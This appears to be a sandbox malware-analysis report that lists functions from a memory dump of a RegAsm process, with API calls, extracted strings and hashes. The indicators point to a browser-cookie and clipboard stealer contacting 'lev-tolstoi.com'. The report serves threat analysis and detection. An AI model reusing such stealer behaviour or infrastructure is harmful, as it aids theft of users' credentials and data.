Source File: 00000008.00000002.1903512649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID: 5$fp
API String ID: 0-3126297774
Opcode ID: dea50d7c3ae242da7a03d3d4985be81e3d164b4c071c66c03cb9f9ca6b42971b
Instruction ID: 50e61009195bbb4e5c45f7de04ee7ea53ac76ad291028902a4cacaad609f7a66
Opcode Fuzzy Hash: dea50d7c3ae242da7a03d3d4985be81e3d164b4c071c66c03cb9f9ca6b42971b
Instruction Fuzzy Hash: F0F1C075908341CFD724DF28C88176ABBE1EF86308F044D3EE489A7392D7399959CB5A

Function 0041F420 Relevance: 1.6, Strings: 1, Instructions: 384COMMON

Download Yara Rule

Strings

LKJI, xrefs: 0041F456

Memory Dump Source

Source File: 00000008.00000002.1903512649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: InitializeThunk
String ID: LKJI
API String ID: 2994545307-2313094147
Opcode ID: 64c96057f69e26782e5562d90c61095a06addd7ec62291071dd3a9d1e0aeac79
Instruction ID: 4606874eaf5867e0141a32941945ca7e78fe0b7f536946e6e1a7707eb3462b45
Opcode Fuzzy Hash: 64c96057f69e26782e5562d90c61095a06addd7ec62291071dd3a9d1e0aeac79
Instruction Fuzzy Hash: 98B1B1756083019BD714DF14C88066BB7E2EF95314F14893EE58987392E339DC9ACB9A

Function 00437570 Relevance: 1.6, APIs: 1, Instructions: 82comCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32(00442A98,00000000,00000001,00442A88,00000000), ref: 00437684

Memory Dump Source

Source File: 00000008.00000002.1903512649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: CreateInstance
String ID:
API String ID: 542301482-0
Opcode ID: 701ac3e7a0e9407803cbf31ab9e62a49babeb92c2b15f5ee8820ac91d7123dbc
Instruction ID: 5f2dd63b0ea36bb9db4e4e233a1332d3422cd3dbcad8a6d982394f4a36ffcb14
Opcode Fuzzy Hash: 701ac3e7a0e9407803cbf31ab9e62a49babeb92c2b15f5ee8820ac91d7123dbc
Instruction Fuzzy Hash: 213101B4240B009FE324CF26C895B53BBE5BB4A714F404E0DE5D64BB90D7B0B445CBA9

Function 0043D1C0 Relevance: 1.5, APIs: 1, Instructions: 14libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL(0040E9C7,?,00000001,?), ref: 0043D1EE

Memory Dump Source

Source File: 00000008.00000002.1903512649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: b66ff63dfd389af1bc8afcc0025f999e8b2b47508af02e865142dda64173a8e3
Instruction ID: fb6f357373f259be8b0e83fffc5d2a3912a28e0da7d2036ce94b71e982b3a7e9
Opcode Fuzzy Hash: b66ff63dfd389af1bc8afcc0025f999e8b2b47508af02e865142dda64173a8e3
Instruction Fuzzy Hash: 76E0FE75908316AB9A09CF45C14444EFBE5BFC4714F11CC8DA4D867210D3B0AD46DF82

Function 00437160 Relevance: 1.5, Strings: 1, Instructions: 254COMMON

Download Yara Rule

Strings

4`[b, xrefs: 00437510

Memory Dump Source

Source File: 00000008.00000002.1903512649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: InitializeThunk
String ID: 4`[b
API String ID: 2994545307-3962175265
Opcode ID: 325d3947db74778f8d9a8bd17eccd46f672c71a4df3ac206c49515b4af64ee2c
Instruction ID: 14391239a0bdb56e3fa08c87aba1a00c6594da1270bb5bf7921aff85895d9795
Opcode Fuzzy Hash: 325d3947db74778f8d9a8bd17eccd46f672c71a4df3ac206c49515b4af64ee2c
Instruction Fuzzy Hash: BDB139B140E3819FD3109F54C59436BBBE0AB99318F85982EF4DA47342C638CA86DB1B

Function 0041A1CA Relevance: 1.5, Strings: 1, Instructions: 235COMMON

Download Yara Rule

Strings

1d@, xrefs: 0041A3ED

Memory Dump Source

Source File: 00000008.00000002.1903512649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID: 1d@
API String ID: 0-4252047040
Opcode ID: 318516293763cd8b3b35d8d7bfd31528a7ebf458205b1b6818195a5e5279995f
Instruction ID: 8f664bb34049271a2f99579e7264d4d70e2cc7f603931a3fc68fbbe798d91ee7
Opcode Fuzzy Hash: 318516293763cd8b3b35d8d7bfd31528a7ebf458205b1b6818195a5e5279995f
Instruction Fuzzy Hash: 18B12B7120E7808FD314DF28C5553AEBBE1AB96314F558E2EE1EA87382D7388845CB17

Function 00415F90 Relevance: 1.4, Strings: 1, Instructions: 195COMMON

Download Yara Rule

Strings

Z`A, xrefs: 00416077

Memory Dump Source

Source File: 00000008.00000002.1903512649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID: Z`A
API String ID: 0-4199311573
Opcode ID: e198195eb890b8adba844e3da9036d15123eb6964e0ff1221d8dafd593aee5bb
Instruction ID: 60449fb154d499ad19e6c8956023cc234c6628da42e2558ca8ebeefa60b1be8c
Opcode Fuzzy Hash: e198195eb890b8adba844e3da9036d15123eb6964e0ff1221d8dafd593aee5bb
Instruction Fuzzy Hash: 7D616FB5E0021A9FDB04CFA8DC81AEEB7F4FB0A314F044429F415E7281E7789955CBA9

Function 0043FBA0 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1903512649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: c29e2f24c8334843651043df075cdad1a97097549541d323c411c9268cfa865a
Instruction ID: 0f0a30558b44177640d2e0751a0562b9918bfb0c3e696cc49f5459e9aa682ff4
Opcode Fuzzy Hash: c29e2f24c8334843651043df075cdad1a97097549541d323c411c9268cfa865a
Instruction Fuzzy Hash: 8C81DD35A083019BD710DF28C980A2BB3F2FF89754F14982DE9859B321D739EC55CB9A

Function 00429C3F Relevance: .2, Instructions: 172COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1903512649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ced4df5b9adf4f55f09ddc639400d236f6830cf5c07eed1a19d0d337bbe938a6
Instruction ID: 7b483474ae0b13d75cc8bc8a9a4374b2ed6ab2b0c1caca2024c5665b32f2811f
Opcode Fuzzy Hash: ced4df5b9adf4f55f09ddc639400d236f6830cf5c07eed1a19d0d337bbe938a6
Instruction Fuzzy Hash: 8181FDB100E7C18EE360AF64C91538FBAE0AFA2719F558C1ED0DC9B342C6798558DB27

Function 0043CC90 Relevance: 14.3, APIs: 1, Strings: 7, Instructions: 328
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

HR, xrefs: 0043D067
s"! , xrefs: 0043D16D, 0043D136
Pb~, xrefs: 0043CEF0
Pb~, xrefs: 0043CCC8
HR, xrefs: 0043CD94
HR, xrefs: 0043D00F
3kbO, xrefs: 0043CEC5

Memory Dump Source

Source File: 00000008.00000002.1903512649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID: 3kbO$HR$HR$HR$Pb~$Pb~$s"!
API String ID: 0-42828811
Opcode ID: bb558dc67b622ac6221e50ec3e685b199f19b08c229ead3e359e06201e07f5d9
Instruction ID: ef0256647878fbf4b2b31e6b1b5f52319a3c5165fc0253120304a0a2350dda30
Opcode Fuzzy Hash: bb558dc67b622ac6221e50ec3e685b199f19b08c229ead3e359e06201e07f5d9
Instruction Fuzzy Hash: B9C13EBAD14260DFCB04AF78F9D117EBBB1AF0A315F45087DD48167251C7398A11CBA9

Function 00437B94 Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 282
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VariantInit.OLEAUT32(?), ref: 00437BF8
VariantClear.OLEAUT32(?), ref: 00437CB9
SysFreeString.OLEAUT32(?), ref: 00437CF2
SysFreeString.OLEAUT32(?), ref: 00437CFE
SysFreeString.OLEAUT32(?), ref: 00437D13
GetVolumeInformationW.KERNEL32(?,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 00437D52
SysStringLen.OLEAUT32(?), ref: 00437D86

Strings

rwC, xrefs: 00437F27

Memory Dump Source

Source File: 00000008.00000002.1903512649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: String$Free$Variant$ClearInformationInitVolume
String ID: rwC
API String ID: 171077572-664771127
Opcode ID: 5a98cdf48252e3456386d0f5a9897aff54ca6d5e08c7e42cf6bd506d7bcea4a3
Instruction ID: 84cc427cd6f76cbf6f86d34f634fd30c58529a23cdd69e98d1486c6bd166a38b
Opcode Fuzzy Hash: 5a98cdf48252e3456386d0f5a9897aff54ca6d5e08c7e42cf6bd506d7bcea4a3
Instruction Fuzzy Hash: 9CB13474204B00CFE724CF25C895B66B7F2FB4A315F14896DE0AB8BAA1D779B845CB44

Function 00437947 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 183
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SysAllocString.OLEAUT32(?), ref: 004379A4
SysAllocString.OLEAUT32(CD15CF5D), ref: 00437A4B
SysAllocString.OLEAUT32(41314329), ref: 00437AC4
SysAllocString.OLEAUT32(CD15CF5D), ref: 00437B6B

Strings

:GDE, xrefs: 00437A6D

Memory Dump Source

Source File: 00000008.00000002.1903512649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: AllocString
String ID: :GDE
API String ID: 2525500382-1503945602
Opcode ID: ab6c6d2f5d6d1b66c25ffa4b8f6d999ef253c5e35e1e7cf7ea0c1d9ed640d5a1
Instruction ID: 4aadb9b73b009d9d39ef49e57a9c1caa982a5c38d5a9b2394ff80889820fd3bf
Opcode Fuzzy Hash: ab6c6d2f5d6d1b66c25ffa4b8f6d999ef253c5e35e1e7cf7ea0c1d9ed640d5a1
Instruction Fuzzy Hash: 6B71FEB4114B408FE335CF29C590A16BBF2FF5A749B640A1DE2C68BB65D339E801CB48

Function 0040D6E0 Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 332
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSystemDirectoryW.KERNEL32(00000000,00000104), ref: 0040DB5C

Strings

lev-tolstoi.com, xrefs: 0040DB2B
32, xrefs: 0040DA89
I4D, xrefs: 0040D6EF

Memory Dump Source

Source File: 00000008.00000002.1903512649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: DirectorySystem
String ID: 32$I4D$lev-tolstoi.com
API String ID: 2188284642-295570194
Opcode ID: 0088224122c14e8f9b2ec813642d9800107c04489a01c12f991a738ba11c6624
Instruction ID: cbd2ab5752681c61e03abecde1fd1bb96bb10a08349c92472eed3befc23396f6
Opcode Fuzzy Hash: 0088224122c14e8f9b2ec813642d9800107c04489a01c12f991a738ba11c6624
Instruction Fuzzy Hash: ABC1AAB150D3D08FD3719F25848479BBBE6AFC6304F144AADE4C86B291CB389909CB97

Function 00409D50 Relevance: 4.5, APIs: 3, Instructions: 28COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32 ref: 00409D5E
ExitProcess.KERNEL32 ref: 00409DB0

Memory Dump Source

Source File: 00000008.00000002.1903512649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Process$CurrentExit
String ID:
API String ID: 2333725396-0
Opcode ID: b0aafb8e2fc7e0e5d99f7962c60e23f7b1841704fe2b744b16b6dd1cb938b739
Instruction ID: 687bfb1e3cf4d61c626d6218dc05512be0c9440381c46b923e10a9e810e8a856
Opcode Fuzzy Hash: b0aafb8e2fc7e0e5d99f7962c60e23f7b1841704fe2b744b16b6dd1cb938b739
Instruction Fuzzy Hash: FCF0377484820096C7543FB5D64935E37A06F95749F10483BE886B11D3DA7E88569A2F

Function 0043D0E0 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 76memoryCOMMON

Download Yara Rule

APIs

RtlReAllocateHeap.NTDLL(?,00000000,?,?), ref: 0043D17B

Strings

s"! , xrefs: 0043D16D, 0043D136

Memory Dump Source

Source File: 00000008.00000002.1903512649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID: s"!
API String ID: 1279760036-3572922315
Opcode ID: fb75515d230ef2053d14c3ccc17844512a5ac63af7629f6eb10cccd959fb98ae
Instruction ID: cc813bb4e0bfcd6247990deebede3e53a99df6ac8137c4ca5e6d779fad953437
Opcode Fuzzy Hash: fb75515d230ef2053d14c3ccc17844512a5ac63af7629f6eb10cccd959fb98ae
Instruction Fuzzy Hash: 8A1105B5A0D240CBD708AF28ED60A2FB7A1EF9A344F05497DE5C647391C7389815CB8B

Function 0043B460 Relevance: 1.6, APIs: 1, Instructions: 79memoryCOMMON

Download Yara Rule

APIs

RtlFreeHeap.NTDLL(?,00000000,?), ref: 0043B52A

Memory Dump Source

Source File: 00000008.00000002.1903512649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: f37e00aec548109468f4530c3b857527330fa30b1b30ec6b0bd039b114067a63
Instruction ID: 65e614fce573d4473c445af343ef893946a7b7d4b871c848650bcec5c4fa4f76
Opcode Fuzzy Hash: f37e00aec548109468f4530c3b857527330fa30b1b30ec6b0bd039b114067a63
Instruction Fuzzy Hash: DB118F746082418BD308DF18D960A6EB7E6EFDA714F24DA5DD1C9473A5CB389811CB89

Function 0043769A Relevance: 1.6, APIs: 1, Instructions: 60memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32(?), ref: 0043770B

Memory Dump Source

Source File: 00000008.00000002.1903512649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: AllocString
String ID:
API String ID: 2525500382-0
Opcode ID: ff5774a2f9cdc1195c8b4c6fd3eb9200d2e336aa9e4d48b932b7728f7ed09cab
Instruction ID: bbf38814ea9a1f2963db611915360d252f6259400ad2cd114ba79efa747d6222
Opcode Fuzzy Hash: ff5774a2f9cdc1195c8b4c6fd3eb9200d2e336aa9e4d48b932b7728f7ed09cab
Instruction Fuzzy Hash: 3311F2B4100A409FE360CF69C994A17BBF1BB5A745F64491CE6CA8BA51D731F402CB54

Function 0042A3CB Relevance: 1.5, APIs: 1, Instructions: 19COMMON

Download Yara Rule

APIs

CoSetProxyBlanket.COMBASE ref: 0042A412

Memory Dump Source

Source File: 00000008.00000002.1903512649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: BlanketProxy
String ID:
API String ID: 3890896728-0
Opcode ID: 8e715ab18571fd0422fd2f97923e00619394d170342e322d1e51ba82b07ebba1
Instruction ID: 84815dbc40820160bee2bf834f4b429e20f9bf2dc8ebac67fd9ca266a52d896c
Opcode Fuzzy Hash: 8e715ab18571fd0422fd2f97923e00619394d170342e322d1e51ba82b07ebba1
Instruction Fuzzy Hash: 41F092B41083418FE320DF18C1A874EBBF0BB84304F108D0CE4988B290DBB999488F82

Function 00431CD6 Relevance: 1.5, APIs: 1, Instructions: 18COMMON

Download Yara Rule

APIs

CoSetProxyBlanket.COMBASE ref: 00431D19

Memory Dump Source

Source File: 00000008.00000002.1903512649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: BlanketProxy
String ID:
API String ID: 3890896728-0
Opcode ID: 643b7a24ed074e39b271ead4e52bdcbc5f7698a1992654ed0c28ce4a24337d56
Instruction ID: a8034237ffab743e3ba4cee21e8beabb46ab2e91a3641a919a4b7f924531e791
Opcode Fuzzy Hash: 643b7a24ed074e39b271ead4e52bdcbc5f7698a1992654ed0c28ce4a24337d56
Instruction Fuzzy Hash: DCF0C9B41087018FE311CF54C0A870BBBF4AB84304F10881CE4948B390C3B6D9498F82

Function 00437745 Relevance: 1.5, APIs: 1, Instructions: 12COMMON

Download Yara Rule

APIs

CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 00437756

Memory Dump Source

Source File: 00000008.00000002.1903512649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: BlanketProxy
String ID:
API String ID: 3890896728-0
Opcode ID: 49ced148cb4438c58991c1b88d3c0a809799ecc734feaa3715b7fce423df7c28
Instruction ID: c332b546420f4c3a190775693540a36bcf80c38a90491d39b89e40133d3bc349
Opcode Fuzzy Hash: 49ced148cb4438c58991c1b88d3c0a809799ecc734feaa3715b7fce423df7c28
Instruction Fuzzy Hash: 8FD001383D0700BAF2321F14AC1BF086628B746F03F200464B382BC0E08AF2A2209A09

Function 0043B452 Relevance: 1.5, APIs: 1, Instructions: 6memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(?,00000000), ref: 0043B456

Memory Dump Source

Source File: 00000008.00000002.1903512649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: b80499cb17a13be9f56606ab7a78d3b5a146d0cf7b2fc08eda16cc4368e5b00a
Instruction ID: c909ec744a81b954bf99e4ee901c99db325b6c032f10637c1952f3d8c6eae106
Opcode Fuzzy Hash: b80499cb17a13be9f56606ab7a78d3b5a146d0cf7b2fc08eda16cc4368e5b00a
Instruction Fuzzy Hash: 36A022F0200B002BF22023280C0AF33300CEB00202FE00880B800802B3C0BAC02800AC

Non-executed Functions

Function 0041D042 Relevance: 36.1, Strings: 28, Instructions: 1072COMMON

Download Yara Rule

Strings

tv, xrefs: 0041D64E
y0{2, xrefs: 0041DCF9
4`[b, xrefs: 0041DEF0
QP, xrefs: 0041DD51
n<l>, xrefs: 0041D58F
4`[b, xrefs: 0041E540
`4u6, xrefs: 0041D5A5
PA, xrefs: 0041D9D6
ZT, xrefs: 0041D7A7
tv, xrefs: 0041D8BE, 0041D918, 0041DB2E, 0041DD9E, 0041DB71, 0041D32E, 0041D371
q p", xrefs: 0041D5C6
DE, xrefs: 0041DF57
yHxJ, xrefs: 0041DD0F
b0W2, xrefs: 0041D59A
u$s&, xrefs: 0041D5D1
w(u*, xrefs: 0041DCB7
7S, xrefs: 0041D9E1
G, xrefs: 0041D56E
LKJI, xrefs: 0041DE8E
x4u6, xrefs: 0041DCEE
VP, xrefs: 0041D7B2
8G:, xrefs: 0041DCE3
6b|, xrefs: 0041D739
X^, xrefs: 0041D9CB
j8n:, xrefs: 0041D584
b,r., xrefs: 0041DCAC
IH, xrefs: 0041D608
a(c*, xrefs: 0041D5B0

Memory Dump Source

Source File: 00000008.00000002.1903512649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID: 8G:$tv$tv$4`[b$4`[b$6b|$7S$DE$G$IH$LKJI$PA$QP$X^$`4u6$a(c*$b,r.$b0W2$j8n:$n<l>$q p"$u$s&$w(u*$x4u6$y0{2$yHxJ$VP$ZT
API String ID: 0-3356148988
Opcode ID: 41fa093b2d1e124c92e636ea236ba8f311e9816d79cb8dddd607be0e19c79782
Instruction ID: e3c3f84fc0e4676d76da8d5e62c6617b1fbf739452add0adf3a9555790c5a120
Opcode Fuzzy Hash: 41fa093b2d1e124c92e636ea236ba8f311e9816d79cb8dddd607be0e19c79782
Instruction Fuzzy Hash: 6DB22FB5508381CBD334CF25C5907ABBBE1FB8A304F10892DE9E95B250DB759986CF86

Function 0041D0A0 Relevance: 35.9, Strings: 28, Instructions: 903COMMON

Download Yara Rule

Strings

tv, xrefs: 0041D64E
y0{2, xrefs: 0041DCF9
4`[b, xrefs: 0041DEF0
QP, xrefs: 0041DD51
n<l>, xrefs: 0041D58F
4`[b, xrefs: 0041E540
`4u6, xrefs: 0041D5A5
PA, xrefs: 0041D9D6
ZT, xrefs: 0041D7A7
tv, xrefs: 0041D8BE, 0041D918, 0041DB2E, 0041DD9E, 0041DB71, 0041D32E, 0041D371
q p", xrefs: 0041D5C6
DE, xrefs: 0041DF57
yHxJ, xrefs: 0041DD0F
b0W2, xrefs: 0041D59A
u$s&, xrefs: 0041D5D1
w(u*, xrefs: 0041DCB7
7S, xrefs: 0041D9E1
G, xrefs: 0041D56E
LKJI, xrefs: 0041DE8E
x4u6, xrefs: 0041DCEE
VP, xrefs: 0041D7B2
8G:, xrefs: 0041DCE3
6b|, xrefs: 0041D739
X^, xrefs: 0041D9CB
j8n:, xrefs: 0041D584
b,r., xrefs: 0041DCAC
IH, xrefs: 0041D608
a(c*, xrefs: 0041D5B0

Memory Dump Source

Source File: 00000008.00000002.1903512649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID: 8G:$tv$tv$4`[b$4`[b$6b|$7S$DE$G$IH$LKJI$PA$QP$X^$`4u6$a(c*$b,r.$b0W2$j8n:$n<l>$q p"$u$s&$w(u*$x4u6$y0{2$yHxJ$VP$ZT
API String ID: 0-3356148988
Opcode ID: b35f8fab119c53329d3cdde15ed5fe0e74439acb37753f2d08dc83d93a61c1a4
Instruction ID: cc08323cb492c1aedd9c341a4489b407d3870e160f3e25f399baae6e63ed4164
Opcode Fuzzy Hash: b35f8fab119c53329d3cdde15ed5fe0e74439acb37753f2d08dc83d93a61c1a4
Instruction Fuzzy Hash: EB920DB450C381CBD334CF15C590BABBBE1BB8A304F10892DE9E99B251DB759586CF86

Function 00401000 Relevance: 32.7, Strings: 25, Instructions: 1447COMMON

Download Yara Rule

Strings

@&@, xrefs: 004025A1
UVWP, xrefs: 0040137B
:>?8, xrefs: 0040129F
QRS\, xrefs: 00401385
'%6#, xrefs: 00401263
yz{D, xrefs: 00401349
FaGF, xrefs: 0040112D
1.-(, xrefs: 00401277
)6, xrefs: 00401281
ijkt, xrefs: 00401321
7450, xrefs: 0040128B
qrs|, xrefs: 00401335
".#,, xrefs: 0040126D
u, xrefs: 00401587
MNHO, xrefs: 00401367
154;, xrefs: 00401295
ABCL, xrefs: 0040135D
iZit, xrefs: 00401580
FkDC, xrefs: 00401123
D, xrefs: 004011C3
ejg`, xrefs: 00401303
8!, xrefs: 0040115F
abl, xrefs: 0040130D
EFG@, xrefs: 00401353
GZEo, xrefs: 00401137

Memory Dump Source

Source File: 00000008.00000002.1903512649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID: ".#,$'%6#$)6$1.-($154;$7450$8!$:>?8$@&@$ABCL$D$EFG@$FaGF$FkDC$GZEo$MNHO$QRS\$UVWP$abl$ejg`$iZit$ijkt$qrs|$u$yz{D
API String ID: 0-2603639887
Opcode ID: 647d70d4e5fef088579fcee83fdd91c4ed6bdc0258378326f84540e5a940fe0e
Instruction ID: 72ffc731ce07a3f854caff7a7daf0d898e1875e41b67a3ad7e76fbb261a1047a
Opcode Fuzzy Hash: 647d70d4e5fef088579fcee83fdd91c4ed6bdc0258378326f84540e5a940fe0e
Instruction Fuzzy Hash: 0BD2E1BAD04269CFDB10CFA8D8913DEBBB0FB4A314F1945A9C5546B391C3389A85CF94

Function 00414930 Relevance: 15.8, Strings: 12, Instructions: 765COMMON

Download Yara Rule

Strings

bd}n, xrefs: 00414E7B
<OlM, xrefs: 00414A97
kh, xrefs: 00414A0B
j, xrefs: 00415180
yvq|, xrefs: 0041528A
ufd!, xrefs: 0041529A
X, xrefs: 00414F21
s2jl, xrefs: 00415292
)W+U, xrefs: 00414AC7
b7G5, xrefs: 00414B06
I3I1, xrefs: 00414A8F
[info] collected cookies file of the chromium-based browser[info] collected cookies file of the chromium-based browser, xrefs: 00415310

Memory Dump Source

Source File: 00000008.00000002.1903512649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID: )W+U$<OlM$I3I1$X$[info] collected cookies file of the chromium-based browser[info] collected cookies file of the chromium-based browser$b7G5$bd}n$j$kh$s2jl$ufd!$yvq|
API String ID: 0-109427602
Opcode ID: 29fd30cf261e2b9c9de3e1684ab40c92816d1d295a4cd1e6096f9a4e76594d66
Instruction ID: 7a0c66129bffa33a8dc1cc5ce2349514f3e74490f15193fd525c918cdc1fdbfc
Opcode Fuzzy Hash: 29fd30cf261e2b9c9de3e1684ab40c92816d1d295a4cd1e6096f9a4e76594d66
Instruction Fuzzy Hash: C74266B050C3808FD315DF28D4906ABFBE1EF96744F188A1DE0D54B392D3799989CB9A

Function 004029D0 Relevance: 10.6, Strings: 8, Instructions: 617COMMON

Download Yara Rule

Strings

null, xrefs: 00402B9D
false, xrefs: 00402AFA
., xrefs: 00402A76
{, xrefs: 00402C52
true, xrefs: 00402AE2
[, xrefs: 00402D78
., xrefs: 00402A9B
0, xrefs: 00402A70

Memory Dump Source

Source File: 00000008.00000002.1903512649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID: .$.$0$[$false$null$true${
API String ID: 0-1639024219
Opcode ID: 86ff2d6cde622eeae8beb7e05740b3ba984604c6ebad03a85a5ec4de99441ce3
Instruction ID: 08dc46ed9fbbfa73974bf942fd237e0fdf9e5ec9833295572e0df28287db2d0a
Opcode Fuzzy Hash: 86ff2d6cde622eeae8beb7e05740b3ba984604c6ebad03a85a5ec4de99441ce3
Instruction Fuzzy Hash: 351247B46043069BE7206F25DD497277BE8AF51348F14803EE88AA63C2E77DD905CB5A

Function 00432460 Relevance: 9.2, APIs: 6, Instructions: 173clipboardCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32 ref: 00432470
GetWindowLongW.USER32 ref: 00432495
GetClipboardData.USER32 ref: 004324A5
GlobalLock.KERNEL32 ref: 004324C8
GlobalUnlock.KERNEL32 ref: 0043272D
CloseClipboard.USER32 ref: 00432736

Memory Dump Source

Source File: 00000008.00000002.1903512649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Clipboard$Global$CloseDataLockLongOpenUnlockWindow
String ID:
API String ID: 2832541153-0
Opcode ID: 21674e64e92a310214568b44b3c1c8fe80a47338733e208df0a675a2a57b3b92
Instruction ID: 2faea90db188dc97f37672c30e5ea99cb2123444b5d3026787ac07b61ac04a01
